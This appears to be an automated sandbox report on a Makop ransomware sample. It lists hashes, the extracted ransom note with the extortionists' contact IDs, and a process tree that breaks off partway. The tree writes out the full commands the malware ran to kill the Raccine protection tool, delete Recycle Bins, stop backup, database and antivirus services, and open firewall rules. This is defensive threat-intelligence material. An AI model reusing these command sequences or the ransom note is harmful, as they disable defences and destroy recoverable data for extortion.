makop | 1136907e76399f1d76694ee9c540b387ed6a5b12340b60f3fabfc183bca457df

General

Target

net_shares.exe
Size

114KB
MD5

07807a9e2aeb0ccc03d88debebcdd2eb
SHA1

13a93e6e785d8f42f062b55fe5ea1ba9e0e139ab
SHA256

1136907e76399f1d76694ee9c540b387ed6a5b12340b60f3fabfc183bca457df
SHA512

1cc1ecab6047c7cc2e81b6b5a9266c25fd9d2a7d26865c0e7554882c0f28f47453fb3c6abc9a613f9af62cf4dd456d079da67897459c9f4d88adb7715547093a

Score

10^/10

makop discovery evasion ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

makop

Ransom Note

::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in Bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: Please, write us to our qTOX account: 7BDD546F7524089A930B12F793F4C1D1B4470A15A4CBA85AA0DA6D030AFE2E48B8799204F004 You can learn about this way of communication and download it here: https://qtox.github.io/ Or use Bitmessage and write to our address: BM-2cUbGd124Dcs1Jdc5VfSa2GDMC1iaNTesC You can learn about this way of communication and download it here: https://wiki.bitmessage.org/ and here: https://github.com/Bitmessage/PyBitmessage/releases/ .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don’t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data. Key Identifier: Yfu9lRJF2zjdaAa92VfTp1QVz/xFKhqLSwxAUSKyJXOzyoGCxDecvSpYx0j2N74vudZag2pQYYQ/K3O1W7upb5Km862FoXeTWhSwRLufOQi25KATv2dFr3T7nXPa0g6mg+VgL5jYtAAQc1NgWP0i3AjIJVoObCjuO/NyAmLiT2szUM+USI9bsmaQ/HMCOUekA1drmJgwWWohMf3NO1IsduA5cdPNTuprB+6YKDpC8/vib7AOPU5xOx89omVDb7HXUXRm1TNoNeEZi+DcEZTkXM7rKoxlCqHBBe6CqoRBUStdj3EMl+MyjGNOHF0DnysiTTKvgVGV2b+l8j40aNMKZ3cIK8gXRLNMVeN/Dlt8ZHhlQ2Intcf1sCkZV1XUAjRZ+WB07bmkdLii4DXlFB2d/rPygsznmrUVAIZQ6ScT/W3UFl2T3dB0OzOUbOfTocmt+A1yZDsJ0Fu2OUCaxY1uBnex6Fkjh7Swohvm9VaNjUuk58Ne+gvadjWFxrurFB5jZtwTFE081GDRkyJg3btLvh2w8tgbx0VAZW3XQql/lCvH8KdgnRbjEw4dqikgnfH4TYj2LoewbBrY5z3vohjJNmWD6Wptyq9kLuncsE+9rIM/hra5iHtWbuIcgbz9AyuGVG361sCeQThqU1Rs+RWKVVm3Bir1KSzWd6tlsgRdEcg= PC Hardware ID: A2C56C1C

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Family

makop

Ransom Note

::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in Bitcoins. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: Please, write us to our qTOX account: 7BDD546F7524089A930B12F793F4C1D1B4470A15A4CBA85AA0DA6D030AFE2E48B8799204F004 You can learn about this way of communication and download it here: https://qtox.github.io/ Or use Bitmessage and write to our address: BM-2cUbGd124Dcs1Jdc5VfSa2GDMC1iaNTesC You can learn about this way of communication and download it here: https://wiki.bitmessage.org/ and here: https://github.com/Bitmessage/PyBitmessage/releases/ .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don’t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data. Key Identifier: Yfu9lRJF2zjdaAa92VfTp1QVz/xFKhqLSwxAUSKyJXOzyoGCxDecvSpYx0j2N74vudZag2pQYYQ/K3O1W7upb5Km862FoXeTWhSwRLufOQi25KATv2dFr3T7nXPa0g6mg+VgL5jYtAAQc1NgWP0i3AjIJVoObCjuO/NyAmLiT2szUM+USI9bsmaQ/HMCOUekA1drmJgwWWohMf3NO1IsduA5cdPNTuprB+6YKDpC8/vib7AOPU5xOx89omVDb7HXUXRm1TNoNeEZi+DcEZTkXM7rKoxlCqHBBe6CqoRBUStdj3EMl+MyjGNOHF0DnysiTTKvgVGV2b+l8j40aNMKZ3cIK8gXRLNMVeN/Dlt8ZHhlQ2Intcf1sCkZV1XUAjRZ+WB07bmkdLii4DXlFB2d/rPygsznmrUVAIZQ6ScT/W3UFl2T3dB0OzOUbOfTocmt+A1yZDsJ0Fu2OUCaxY1uBnex6Fkjh7Swohvm9VaNjUuk58Ne+gvadjWFxrurFB5jZtwTFE081GDRkyJg3btLvh2w8tgbx0VAZW3XQql/lCvH8KdgnRbjEw4dqikgnfH4TYj2LoewbBrY5z3vohjJNmWD6Wptyq9kLuncsE+9rIM/hra5iHtWbuIcgbz9AyuGVG361sCeQThqU1Rs+RWKVVm3Bir1KSzWd6tlsgRdEcg= Number of files that were processed is: 1868 PC Hardware ID: A2C56C1C

Signatures

Makop
Ransomware family discovered by @VK_Intel in early 2020.
ransomware makop
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops startup file 1 IoCs

Processes:

net_shares.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk net_shares.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

4808 icacls.exe
4012 icacls.exe
1256 icacls.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	net_shares.exe

pid	process
4808	icacls.exe
4012	icacls.exe
1256	icacls.exe

Drops file in Program Files directory 18 IoCs

Processes:

net_shares.exe

description	ioc	process
File opened for modification	C:\Program Files\ConvertToSkip.odp.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\SwitchOpen.lnk.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\UnblockRevoke.xla.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\UninstallRequest.docx.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\HideSync.wmf.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\JoinConvertTo.html.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\ResumeBlock.wmf.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\FindUninstall.bat.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\GroupTest.hta.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\ReadFind.xlt.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\RenameMount.asf.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\SearchUndo.midi.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\ApproveSelect.mpv2.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\EnableCheckpoint.bat.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\ExpandRedo.scf.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\SelectNew.vbs.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\SyncStop.avi.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Program Files\ReadResume.pot.[ID-A2C56C1C].uo8bpy	net_shares.exe

Drops file in Windows directory 11 IoCs

Processes:

net_shares.exe

description	ioc	process
File opened for modification	C:\Windows\WindowsShell.Manifest	net_shares.exe
File opened for modification	C:\Windows\WindowsUpdate.log.[ID-A2C56C1C].uo8bpy	net_shares.exe
File created	C:\Windows\RESTORE_FILES_INFO.txt	net_shares.exe
File opened for modification	C:\Windows\DtcInstall.log.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Windows\lsasetup.log.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Windows\Professional.xml.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Windows\win.ini.[ID-A2C56C1C].uo8bpy	net_shares.exe
File created	C:\Windows\bootstat.dat.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Windows\PFRO.log.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Windows\setupact.log.[ID-A2C56C1C].uo8bpy	net_shares.exe
File opened for modification	C:\Windows\system.ini.[ID-A2C56C1C].uo8bpy	net_shares.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2300	taskkill.exe
3168	taskkill.exe
4412	taskkill.exe
4960	taskkill.exe
1092	taskkill.exe
4272	taskkill.exe
4652	taskkill.exe
5112	taskkill.exe
4904	taskkill.exe
4328	taskkill.exe
2724	taskkill.exe
4316	taskkill.exe
2080	taskkill.exe
4304	taskkill.exe
4132	taskkill.exe
3172	taskkill.exe
3712	taskkill.exe
4848	taskkill.exe
2144	taskkill.exe
4408	taskkill.exe
4656	taskkill.exe
4392	taskkill.exe
4648	taskkill.exe
5080	taskkill.exe
4472	taskkill.exe
2408	taskkill.exe
4160	taskkill.exe
4552	taskkill.exe
4324	taskkill.exe
4236	taskkill.exe
1120	taskkill.exe
4640	taskkill.exe
4752	taskkill.exe
4352	taskkill.exe
2368	taskkill.exe
2664	taskkill.exe
1736	taskkill.exe
4240	taskkill.exe
5116	taskkill.exe
4952	taskkill.exe
4308	taskkill.exe
4308	taskkill.exe
184	taskkill.exe
2248	taskkill.exe
2932	taskkill.exe
4320	taskkill.exe
1736	taskkill.exe
4700	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3340 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

4724 notepad.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5096 PING.EXE

pid	process
3340	reg.exe

pid	process
4724	notepad.exe

pid	process
5096	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

net_shares.exe

pid	process
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe
3968	net_shares.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

net_shares.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exetaskkill.exenet.exetaskkill.exetaskkill.exeConhost.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exeConhost.exeConhost.exetaskkill.exetaskkill.exenet.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exenet.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3968	net_shares.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeDebugPrivilege	4960	taskkill.exe
Token: SeDebugPrivilege	1092	net.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	4240	net.exe
Token: SeDebugPrivilege	5116	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	2724	Conhost.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	4316	Conhost.exe
Token: SeDebugPrivilege	2932	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	4320	Conhost.exe
Token: SeDebugPrivilege	4552	Conhost.exe
Token: SeDebugPrivilege	4952	Conhost.exe
Token: SeDebugPrivilege	4752	taskkill.exe
Token: SeDebugPrivilege	184	taskkill.exe
Token: SeDebugPrivilege	2300	net.exe
Token: SeDebugPrivilege	4236	Conhost.exe
Token: SeDebugPrivilege	4648	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	5080	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	4304	taskkill.exe
Token: SeDebugPrivilege	2368	taskkill.exe
Token: SeDebugPrivilege	4132	taskkill.exe
Token: SeDebugPrivilege	4408	taskkill.exe
Token: SeDebugPrivilege	4472	taskkill.exe
Token: SeDebugPrivilege	4652	Conhost.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	4328	net.exe
Token: SeDebugPrivilege	1120	taskkill.exe
Token: SeDebugPrivilege	3168	taskkill.exe
Token: SeDebugPrivilege	4656	taskkill.exe
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeDebugPrivilege	4392	net.exe
Token: SeDebugPrivilege	3172	taskkill.exe
Token: SeDebugPrivilege	4640	taskkill.exe
Token: SeDebugPrivilege	3712	taskkill.exe
Token: SeDebugPrivilege	4412	Conhost.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	4700	taskkill.exe
Token: SeDebugPrivilege	1848	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

net_shares.exe

pid process

3968 net_shares.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

net_shares.exe

pid process

3968 net_shares.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

net_shares.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3968 wrote to memory of 2408	3968	net_shares.exe	taskkill.exe
PID 3968 wrote to memory of 2408	3968	net_shares.exe	taskkill.exe
PID 3968 wrote to memory of 2984	3968	net_shares.exe	reg.exe
PID 3968 wrote to memory of 2984	3968	net_shares.exe	reg.exe
PID 3968 wrote to memory of 3340	3968	net_shares.exe	reg.exe
PID 3968 wrote to memory of 3340	3968	net_shares.exe	reg.exe
PID 3968 wrote to memory of 4080	3968	net_shares.exe	schtasks.exe
PID 3968 wrote to memory of 4080	3968	net_shares.exe	schtasks.exe
PID 3968 wrote to memory of 2320	3968	net_shares.exe	cmd.exe
PID 3968 wrote to memory of 2320	3968	net_shares.exe	cmd.exe
PID 3968 wrote to memory of 416	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 416	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 3964	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 3964	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 296	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 296	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 1564	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 1564	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 2892	3968	net_shares.exe	cmd.exe
PID 3968 wrote to memory of 2892	3968	net_shares.exe	cmd.exe
PID 3968 wrote to memory of 3808	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 3808	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 1248	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 1248	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 1224	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 1224	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 3092	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 3092	3968	net_shares.exe	sc.exe
PID 3968 wrote to memory of 3912	3968	net_shares.exe	netsh.exe
PID 3968 wrote to memory of 3912	3968	net_shares.exe	netsh.exe
PID 3968 wrote to memory of 1348	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 1348	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 3936	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 3936	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 3488	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 3488	3968	net_shares.exe	net.exe
PID 1348 wrote to memory of 2932	1348	net.exe	net1.exe
PID 1348 wrote to memory of 2932	1348	net.exe	net1.exe
PID 3936 wrote to memory of 1252	3936	net.exe	net1.exe
PID 3936 wrote to memory of 1252	3936	net.exe	net1.exe
PID 3488 wrote to memory of 2948	3488	net.exe	net1.exe
PID 3488 wrote to memory of 2948	3488	net.exe	net1.exe
PID 3968 wrote to memory of 2476	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 2476	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 1524	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 1524	3968	net_shares.exe	net.exe
PID 2476 wrote to memory of 572	2476	net.exe	svchost.exe
PID 2476 wrote to memory of 572	2476	net.exe	svchost.exe
PID 1524 wrote to memory of 2128	1524	net.exe	net1.exe
PID 1524 wrote to memory of 2128	1524	net.exe	net1.exe
PID 3968 wrote to memory of 2112	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 2112	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 1836	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 1836	3968	net_shares.exe	net.exe
PID 2112 wrote to memory of 1328	2112	net.exe	net1.exe
PID 2112 wrote to memory of 1328	2112	net.exe	net1.exe
PID 1836 wrote to memory of 540	1836	net.exe	net1.exe
PID 1836 wrote to memory of 540	1836	net.exe	net1.exe
PID 3968 wrote to memory of 3616	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 3616	3968	net_shares.exe	net.exe
PID 3616 wrote to memory of 3980	3616	net.exe	Conhost.exe
PID 3616 wrote to memory of 3980	3616	net.exe	Conhost.exe
PID 3968 wrote to memory of 4116	3968	net_shares.exe	net.exe
PID 3968 wrote to memory of 4116	3968	net_shares.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\net_shares.exe
"C:\Users\Admin\AppData\Local\Temp\net_shares.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3968

C:\Windows\SYSTEM32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408

C:\Windows\SYSTEM32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:2984

C:\Windows\SYSTEM32\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:3340

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:4080

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
PID:2320

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:416

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:296

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:1564

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
PID:2892

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:3964

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:3808

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1248

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:1224

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:3092

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:3912

C:\Windows\SYSTEM32\net.exe
"net.exe" start Dnscache /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Dnscache /y
3⤵
PID:1252

C:\Windows\SYSTEM32\net.exe
"net.exe" start FDResPub /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start FDResPub /y
3⤵
PID:2932

C:\Windows\SYSTEM32\net.exe
"net.exe" stop bedbg /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
3⤵
PID:2948

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
3⤵
PID:572

C:\Windows\SYSTEM32\net.exe
"net.exe" start SSDPSRV /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
3⤵
PID:2128

C:\Windows\SYSTEM32\net.exe
"net.exe" stop EhttpSrv /y
2⤵
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
3⤵
PID:1328

C:\Windows\SYSTEM32\net.exe
"net.exe" start upnphost /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start upnphost /y
3⤵
PID:540

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MMS /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
3⤵
PID:3980

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
2⤵
PID:4116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
3⤵
PID:4156

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ekrn /y
2⤵
PID:4176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
3⤵
PID:4224

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mozyprobackup /y
2⤵
PID:4244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
3⤵
PID:4316

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
2⤵
PID:4340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
3⤵
PID:4432

C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:4352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:4416

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:4460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:4532

C:\Windows\SYSTEM32\net.exe
"net.exe" stop EPSecurityService /y
2⤵
PID:4480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
3⤵
PID:4560

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ESHASRV /y
2⤵
PID:4580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
3⤵
PID:4640

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:4612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:4680

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SDRSVC /y
2⤵
PID:4696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
3⤵
PID:4748

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$TPS /y
2⤵
PID:4732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
3⤵
PID:4812

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
2⤵
PID:4796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:4876

C:\Windows\SYSTEM32\net.exe
"net.exe" stop EPUpdateService /y
2⤵
PID:4864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
3⤵
PID:4924

C:\Windows\SYSTEM32\net.exe
"net.exe" stop FA_Scheduler /y
2⤵
PID:4932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
3⤵
PID:4988

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ntrtscan /y
2⤵
PID:5000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
3⤵
PID:5076

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:5040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:5100

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$TPSAMA /y
2⤵
PID:2144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
3⤵
PID:4184

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:1084

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
2⤵
PID:4164

C:\Windows\system32\net1.exe
